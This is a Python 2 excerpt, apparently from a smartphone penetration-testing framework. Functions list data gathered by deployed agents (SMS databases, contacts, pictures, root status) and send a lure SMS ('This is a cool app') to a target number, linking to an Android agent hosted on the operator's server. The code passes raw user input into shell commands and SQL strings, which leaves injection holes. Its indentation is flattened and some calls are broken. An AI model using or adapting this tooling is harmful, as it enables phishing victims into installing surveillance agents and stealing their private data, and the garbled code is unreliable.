def view_data():
# View agent data
rowsquery = 'SELECT COUNT(*) from %s' % 'agents'
row = db_exec_rows(rowsquery)
print color(35,'[*] View Data Gathered from a Deployed Agent:\n')
print color(35,'[*] Available Agents:\n')
i=1
while i <= row:
selectquery = 'SELECT number from agents where id=%s' % str(i)
r = db_exec_rows(selectquery)
print color(35,'\t%s.)' % i)+str(' %s\n' % r)
i+=1
print color(33,'\n[*] Select an agent to interact with, or press 0 to return to the previous menu.\n')
x=0
chosenagent = raw_input(color(31,'[*] spf>'))
if chosenagent in('exit', '', '0', 0):
return x
else:
try:
x = get_data(chosenagent)
except Exception, e:
print color(31,'[!] Error: %s' % e)
x=1
def get_data(x):
# Pull data from the DB gathered by agent? not sure
# TODO: what it do, mayne.
x = str(x)
y = 0
try:
query1 = 'SELECT %s from data where id=%s' % ('sms', x)
smsrow = db_exec_rows(query1)
query2 = 'SELECT %s from data where id=%s' % ('contacts', x)
contactsrow = db_exec_rows(query2)
query3 = 'SELECT %s from data where id=%s' % ('picture', x)
picturerow = db_exec_rows(query3)
query4 = 'SELECT %s from data where id=%s' % ('root', x)
rootrow = db_exec_rows(query4)
data_table =(color(35,'\n\n[*] Data:\n') +
color(33,str('[+] SMS Database: %s' % smsrow +
'[+] Contacts: %s' % contactsrow +
'[+] Picture Location: %s' % picturerow +
'[+] Rooted: %s' % rootrow )))
print data_table
except Exception, e:
print color(31,'[!] Error: %s' % e)
y=1
def get_modem():
# Return list of available modems from the MySQL DB
rowsquery = 'SELECT COUNT(*) from modems'
row = db_exec_rows(rowsquery)
if row in (0, 1):
return row
print color(35,'\n\n[*] Available Modem(s):\n')
i=1
while i <= row:
selectquery = 'SELECT %s from modems where id=%s' % ('number', i)
r = db_exec_rows(selectquery)
print color(35,'\t%s.)' % i) + ' %s\n' % r
i+=1
chosenmodem = raw_input(color(35,'\nSelect a modem to interact with\n\n') + color(31,'[*] spf>'))
try:
foo = int(chosenmodem)
except Exception, e:
print color(31,'[!] Error when casting input as int: %s' % e)
def get_usb_modem():
# Return list of available usb modems from the MySQL DB
rowsquery = 'SELECT COUNT(*) from modems where type="usb"'
row = db_exec_rows(rowsquery)
if row in (0, 1):
return row
# Pretty print available modems
print color(33,'\n\nAvailable Modems:\n\n')
rowsquery2 = 'SELECT COUNT(*) from modems'
row2 = int(db_exec_rows(rowsquery2))
i=0
while i <= row2:
selectquery = 'SELECT type from modems where id=%s' % str(i)
r = db_exec_rows(selectquery)
if str(r) == 'usb':
selectquery = "SELECT number from modems where id=%s" % str(i)
r = db_exec_rows(selectquery)
print color(35,'\t%s.)' % i) + ' %s\n' % r
i+=1
chosenmodem = str(raw_input(color(35,'\n[*] Select a modem to interact with\n') + color(31, '[*] spf>')))
if chosenmodem <= row2:
return chosenmodem
try:
foo = int(chosenmodem)
except Exception, e:
print color(31, '[!] Error when casting input as int: %s' % e)
def direct_download():
#TODO: cleanup
webserver = config.get('Web', 'server')
ipaddress = config.get('Web', 'ipaddress')
print color(35, '[*] This module sends an SMS with a link to directly download and install an Agent\n')
print color(31, '[!] ONLY Android currently Supported')
#platform = str(raw_input('Platform(Android/iPhone/Blackberry): '))
platform = 'android'
# Lots of potential for error with the way this is handled, would
# prefer safer execution
path = str(raw_input(color(33, '[-] Hosting Path: ' )))
filename = str(raw_input(color(33, '[-] Filename: ' )))
number = str(raw_input(color(33, '[-] Phone Number to Attack: ')))
if platform.lower() == 'android':
link = 'http://%s%s%s' % (ipaddress, path, filename)
fullpath = '%s%s' % (webserver, path)
command1 = 'mkdir %s' % fullpath
system(command1)
global location # Android agent location
command = 'cp %s %s%s%s'% (location, webserver, path, filename)
system(command)
modem = get_modem()
if modem == 0:
print color(31, '\n[!] No modems found. Attach a modem to use this functionality\n')
return 0
else:
pathquery = "SELECT %s from modems where id=%s" % ('path', modem)
path2 = db_exec_rows(pathquery)
keyquery = "SELECT %s from modems where id=%s" % ('controlkey', modem)
key2 = db_exec_rows(keyquery)
modemtypequery = "SELECT %s from modems where id=%s" % ('type', modem)
modemtype2 = db_exec_rows(modemtypequery)
if modemtype2 == 'usb':
usb = serial.serialposix(port='/dev/ttyUSB2', baudrate=115200, bytesize=8, parity='N', stopbits=1)
usb.write('ATZ\r\n')
sleep(1)
line = read_modem(usb)
print line
sleep(1)
usb.write('AT+CMGF=1\r\n')
line = read_modem(usb)
print line
sleep(1)
numberline = 'AT+CMGS="%s"\r\n' % number
usb.write(numberline)
line = read_modem(usb)
print line
sleep(1)
msg = 'This is a cool app: %s' % link
usb.write(struct.pack('b', 26, msg))
sleep(5)
line = read_modem(usb)
print line
sleep(1)
usb.close()
elif modemtype2 == 'app':
control = '%s%s/getfunc' % (webserver, path2)
command2 = '%s SEND %s This is a cool app: %s' % (key2, number, link)
file = open(control, 'w')
file.write(command2)
file.close()
return 0